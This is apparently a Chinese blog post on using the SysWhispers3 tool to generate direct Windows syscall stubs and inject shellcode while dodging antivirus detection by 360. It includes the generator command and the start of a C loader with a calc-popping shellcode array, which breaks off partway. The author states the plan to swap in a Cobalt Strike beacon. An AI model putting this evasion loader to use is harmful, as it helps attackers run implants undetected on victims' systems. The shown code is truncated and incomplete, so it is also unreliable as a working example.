syscall函数(调用底层,非windowsAPI)去执行shellcode

利用SysWhispers3进行Windows系统调用:动态payload与杀毒检测
文章介绍了如何使用SysWhispers3库在Windows系统中执行NtCreateThreadEx和NtProtectVirtualMemory等函数,创建一个弹出计算器的payload。然而,由于syscall的静态特征容易被杀毒软件如360识别,导致payload被标记为病毒。

首先使用github提供的项目https://github.com/klezVirus/SysWhispers3
利用该工具去执行命令

python3 syswhispers.py --functions NtCreateThreadEx,NtProtectVirtualMemory,NtAllocateVirtualMemory -o syscalls_mem --arch x64 --wow64

然后会产生三个文件
在这里插入图片描述
然后我们将它放到vs studio中,如下:
在这里插入图片描述
我们分开来看
ConsoleApplication3.c:(该payload是弹出计算器,还需要后续去改成上线cs)

#define _CRT_SECURE_NO_WARNINGS 1
#include "syscalls_mem.h"
#include <Windows.h>
#include<stdio.h>

unsigned char calc_payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"</
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值